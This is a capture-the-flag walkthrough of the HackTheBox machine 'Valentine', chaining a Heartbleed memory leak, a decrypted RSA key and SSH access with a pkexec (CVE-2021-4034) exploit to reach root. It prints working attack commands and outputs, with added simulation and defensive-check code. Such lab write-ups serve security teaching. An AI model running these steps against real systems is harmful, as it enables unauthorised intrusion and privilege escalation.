HackTheBox - Valentine

Updated 29-03-2026

A Linux machine named after its core vulnerability — a memory disclosure flaw in OpenSSL leaks just enough data to decrypt an encrypted RSA key found hiding in the web server’s directory listing.

Recon

Nmap

$ target=10.129.232.136; ports=$(nmap -p- --min-rate=1000 -T4 "$target" 2>/dev/null | awk -F/ '/^[0-9]+\/tcp/ && /open/ {print $1}' | paste -sd, -); nmap -p"$ports" -sC -sV "$target"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-17 09:01 EST
Nmap scan report for 10.129.232.136
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_ssl-date: 2026-02-17T14:02:05+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after: 2019-02-06T00:45:25
|_http-server-header: Apache/2.2.22 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.53 seconds

Foothold

Hostname Setup

Add the vhost to hosts file.

$ echo '10.129.232.136 valentine.htb' | sudo tee -a /etc/hosts

Web Enumeration

Use ffuf to enumerate directories.

$ ffuf -c -u http://valentine.htb/FUZZ -w /usr/share/dirb/wordlists/common.txt 


v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://valentine.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/dirb/wordlists/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.hta [Status: 403, Size: 285, Words: 21, Lines: 11, Duration: 132ms]
[Status: 200, Size: 38, Words: 2, Lines: 2, Duration: 611ms]
.htpasswd [Status: 403, Size: 290, Words: 21, Lines: 11, Duration: 2690ms]
.htaccess [Status: 403, Size: 290, Words: 21, Lines: 11, Duration: 4614ms]
cgi-bin/ [Status: 403, Size: 289, Words: 21, Lines: 11, Duration: 123ms]
decode [Status: 200, Size: 552, Words: 73, Lines: 26, Duration: 124ms]
dev [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 140ms]
encode [Status: 200, Size: 554, Words: 73, Lines: 28, Duration: 151ms]
index [Status: 200, Size: 38, Words: 2, Lines: 2, Duration: 302ms]
index.php [Status: 200, Size: 38, Words: 2, Lines: 2, Duration: 314ms]
server-status [Status: 403, Size: 294, Words: 21, Lines: 11, Duration: 125ms]
:: Progress: [4614/4614] :: Job [1/1] :: 248 req/sec :: Duration: [0:00:21] :: Errors: 0 ::

We find the following routes:

decode
dev
encode

In the /dev directory listing we find notes.txt, which says that the encoding and decoding are done server-side, and hype_key, a hex-encoded RSA private key that is itself encrypted with a passphrase.

So the next goal is to find the passphrase that decrypts it.

Vulnerability Discovery

Running nmap's vuln script category against ports 80 and 443 shows that the TLS service on port 443 is vulnerable to CVE-2014-0160 (Heartbleed), an OpenSSL bug that lets a client read chunks of the server process's memory.

$ sudo nmap --script=vuln -sV -p80,443 valentine.htb
443/tcp open ssl/http Apache httpd 2.2.22
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
<-SNIP->
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| http://www.openssl.org/news/secadv_20140407.txt
|_ http://cvedetails.com/cve/2014-0160/
<-SNIP->
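To make the nmap description concrete, here is an added Python simulation (not code from this writeup or from OpenSSL) of the heartbeat handler before and after the fix: a request claims a payload length, and only the patched handler checks that claim against the real record length. The "neighbouring memory" bytes are constructed; payload_length is a 16-bit field, so a single heartbeat can return up to 65535 bytes.

```python
import struct

# RFC 6520 heartbeat message inside a TLS record:
#   type (1 byte) | payload_length (2 bytes, big-endian) | payload | padding (>= 16 bytes)
HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
HEADER = 1 + 2
MIN_PADDING = 16

# Constructed for this example: what sits in the heap just past the record, here a
# copied form body like the one found in the real dump, then zeroed space.
NEIGHBOUR_MEMORY = b"$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" + b"\x00" * 64


def build_request(claimed_len, payload=b"hi"):
    """Return (record, heap): the heartbeat record, and the record followed by neighbouring memory."""
    record = (bytes([HEARTBEAT_REQUEST]) + struct.pack(">H", claimed_len)
              + payload + b"\x00" * MIN_PADDING)
    return record, record + NEIGHBOUR_MEMORY


def respond_vulnerable(heap, record_len):
    """Pre-patch logic: trust payload_length and echo that many bytes after the header.

    record_len is deliberately unused; that omission is the bug. The C code copied past
    the end of the record, and the Python slice likewise runs into the simulated heap."""
    claimed = struct.unpack(">H", heap[1:3])[0]
    return bytes([HEARTBEAT_RESPONSE]) + heap[1:3] + heap[HEADER:HEADER + claimed]


def respond_fixed(heap, record_len):
    """Patched logic: discard silently when the claimed payload cannot fit in the record."""
    if record_len < HEADER + MIN_PADDING:              # not even room for an empty payload
        return None
    claimed = struct.unpack(">H", heap[1:3])[0]
    if HEADER + claimed + MIN_PADDING > record_len:    # the bounds check the fix introduced
        return None
    return bytes([HEARTBEAT_RESPONSE]) + heap[1:3] + heap[HEADER:HEADER + claimed]


def over_read(response, payload):
    """Bytes the response carries beyond the genuine payload (0 for an honest exchange)."""
    return max(0, len(response) - HEADER - len(payload))


if __name__ == "__main__":
    record, heap = build_request(claimed_len=2000)   # lies: the payload is only 2 bytes
    leaked = respond_vulnerable(heap, len(record))
    print("vulnerable handler returned", over_read(leaked, b"hi"), "bytes of other memory")
    print("fixed handler returned", respond_fixed(heap, len(record)))
```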

Heartbleed Memory Leak

We use Metasploit’s openssl_heartbleed auxiliary module to capture the leaked memory.

$ msfconsole -q -x "use auxiliary/scanner/ssl/openssl_heartbleed; set RHOSTS valentine.htb; set LEAK_COUNT 10; run;"
RHOSTS => valentine.htb
LEAK_COUNT => 10
[+] 10.129.232.136:443 - Heartbeat response with leak, 655350 bytes
[*] valentine.htb:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssl/openssl_heartbleed) > dump
[+] 10.129.232.136:443 - Heartbeat response with leak, 655350 bytes
[+] 10.129.232.136:443 - Heartbeat data stored in /home/kali/.msf4/loot/20260217135153_default_10.129.232.136_openssl.heartble_282878.bin
[*] valentine.htb:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Upon inspecting the dump, we find the remains of an HTTP POST to decode.php whose form body contains a base64-encoded value.

$ cat /home/kali/.msf4/loot/20260217135153_default_10.129.232.136_openssl.heartble_282878.bin

�`g�]b�f��oC0/A��Ϳ�vI���
"�!98����5����
�� ��32��ED��/�A���
� �ux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Referer: https://127.0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==���Uͱ=n�աI��כ�vg


<--SNIP-->

Decode it:

$ echo 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==' | base64 -d
heartbleedbelievethehype
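Reading a loot file by eye works for one dump; the following added Python (not from the writeup) automates that triage step for a responder assessing what leaked: it scans a blob for base64-shaped tokens, keeps those that decode to printable text and drops the rest. The dump bytes are a constructed sample modelled on the excerpt above.

```python
import base64
import binascii
import re

# Constructed sample modelled on the loot file above: binary noise around a captured
# HTTP request whose form body carries a base64 value, plus a decoy token that is
# valid base64 but decodes to non-printable bytes.
SAMPLE_DUMP = (
    b"\x8e`g\xba]b\xc3f\xaaoC0/A\xe2\xcd\xbfvI\xa3\n"
    b"Referer: https://127.0.0.1/decode.php\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 42\r\n\r\n"
    b"$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==\xcc\xd5\xcd\xb1=n\xd5\n"
    b"noise: ////////////////\n"
)

# A run of base64 alphabet of 16+ chars with optional '=' padding, not glued to
# other base64 characters on either side.
B64_TOKEN = re.compile(rb"(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{16,}={0,2})(?![A-Za-z0-9+/=])")


def is_printable(raw):
    """ASCII text plus tab, newline and carriage return only."""
    return all(32 <= c < 127 or c in (9, 10, 13) for c in raw)


def decoded_tokens(blob):
    """Return (token, decoded) pairs for base64 tokens whose decoding is printable text."""
    hits = []
    for match in B64_TOKEN.finditer(blob):
        token = match.group(1)
        if len(token) % 4:            # base64 is always a multiple of four characters
            continue
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw and is_printable(raw):
            hits.append((token, raw))
    return hits


if __name__ == "__main__":
    for token, raw in decoded_tokens(SAMPLE_DUMP):
        print(token.decode(), "->", raw.decode().rstrip())
```

On a real loot file, pass `open(path, "rb").read()` instead of the sample; high-entropy decodings that fail the printable test are usually key or session material rather than text.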

Key Recovery and Decryption

Grab the key and attempt to decrypt it using the recovered phrase.

$ curl http://valentine.htb/dev/hype_key -o hype-key 

Convert the hex to a PEM file:

$ xxd -r -p hype-key key.pem 

Now key.pem should look like this:

$ cat key.pem 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

<-SNIP->
-----END RSA PRIVATE KEY-----

Decrypt it using the passphrase heartbleedbelievethehype:

$ openssl rsa -in key.pem -out decrypted_key.pem

Enter pass phrase for key.pem:
writing RSA key

Since the file is called hype_key, the likely user is hype, so we attempt an SSH login as hype with the decrypted key. Restrict the key file's permissions first, because ssh refuses to use a private key that other users can read.

$ chmod 600 decrypted_key.pem 

SSH Access

The first connection attempt fails: the client runs a modern OpenSSH, while the server only accepts RSA signatures made with SHA-1 (the ssh-rsa algorithm), which OpenSSH 8.8 and later disable by default.

$ ssh hype@valentine.htb -i decrypted_key.pem
sign_and_send_pubkey: no mutual signature supported
hype@valentine.htb's password:

Connect again with ssh-rsa explicitly re-enabled for this connection. Keep these options on the command line (or in a Host block for this machine only) rather than in a global ssh_config, since they re-enable SHA-1 signatures for every server otherwise.

$ ssh -i decrypted_key.pem \
-o HostKeyAlgorithms=+ssh-rsa \
-o PubkeyAcceptedAlgorithms=+ssh-rsa \
hype@valentine.htb

We have successfully logged in.

Privilege Escalation

Enumeration

Copy linPEAS to /tmp to search for local privilege escalation paths.

$ scp -i decrypted_key.pem \
-o HostKeyAlgorithms=+ssh-rsa \
-o PubkeyAcceptedAlgorithms=+ssh-rsa \
linpeas.sh hype@valentine.htb:/tmp/

After running linPEAS, the following potential issue is identified:

hype@Valentine:/tmp$ chmod +x linpeas.sh
hype@Valentine:/tmp$ ./linpeas.sh

<-SNIP->
══╣ Polkit Binary
Pkexec binary found at: /usr/bin/pkexec
Pkexec binary has SUID bit set!
-rwsr-xr-x 1 root root 23184 Jan 6 2012 /usr/bin/pkexec
pkexec version 0.104
<-SNIP->

pkexec version 0.104 is vulnerable to CVE-2021-4034, a local privilege escalation flaw in Polkit’s pkexec utility.
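From the defending side, the linPEAS finding reduces to two facts: pkexec is set-user-ID root, and the installed polkit build lacks the fix. This added Python check (not part of linPEAS or of this writeup; the binary path and the banner format are assumptions) reports those facts and, only when explicitly asked, applies the stopgap of removing the set-user-ID bit.

```python
import os
import re
import stat
import subprocess

PKEXEC = "/usr/bin/pkexec"  # assumed default location; adjust for the host


def is_suid_root(st_mode, st_uid):
    """True when the mode has the set-user-ID bit and the owner is root (uid 0)."""
    return st_uid == 0 and bool(st_mode & stat.S_ISUID)


def parse_version(banner):
    """Turn 'pkexec version 0.104' into (0, 104); None when no version is present."""
    match = re.search(r"pkexec version (\d+(?:\.\d+)*)", banner)
    return tuple(int(part) for part in match.group(1).split(".")) if match else None


def assess(st_mode, st_uid, banner):
    """Classify a pkexec binary from its stat() fields and its --version output."""
    finding = {"version": parse_version(banner), "suid_root": is_suid_root(st_mode, st_uid)}
    if not finding["suid_root"]:
        finding["action"] = "none: pkexec is not set-user-ID root, so CVE-2021-4034 is not reachable"
    else:
        # Distributions backport fixes without bumping the version, so the version string
        # can only raise suspicion; the package changelog settles whether the fix is present.
        finding["action"] = ("confirm the polkit package contains the CVE-2021-4034 fix; "
                             "until it does, drop the set-user-ID bit with chmod 0755")
    return finding


def check_host(path=PKEXEC, apply_stopgap=False):
    """Assess the real binary; only changes its mode when apply_stopgap is True."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    try:
        banner = subprocess.run([path, "--version"], capture_output=True, text=True).stdout
    except OSError:
        banner = ""
    finding = assess(st.st_mode, st.st_uid, banner)
    if apply_stopgap and finding["suid_root"]:
        os.chmod(path, 0o755)  # stopgap mitigation; needs root, and a package update restores the bit
        finding["action"] = "set-user-ID bit removed from " + path
    return finding


if __name__ == "__main__":
    print(check_host() or f"{PKEXEC} not found")
```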

Exploit

Use this PoC. Clone the repository:

$ git clone https://github.com/ryaagard/CVE-2021-4034.git

Transfer the files to the target:

$ cd CVE-2021-4034

$ scp -i ../decrypted_key.pem \
-o HostKeyAlgorithms=+ssh-rsa \
-o PubkeyAcceptedAlgorithms=+ssh-rsa \
Makefile evil-so.c exploit.c hype@valentine.htb:/tmp/

Compile and run the exploit:

hype@Valentine:/tmp$ gcc -shared -o evil.so -fPIC evil-so.c
hype@Valentine:/tmp$ gcc exploit.c -o exploit
hype@Valentine:/tmp$ ./exploit
# whoami
root
#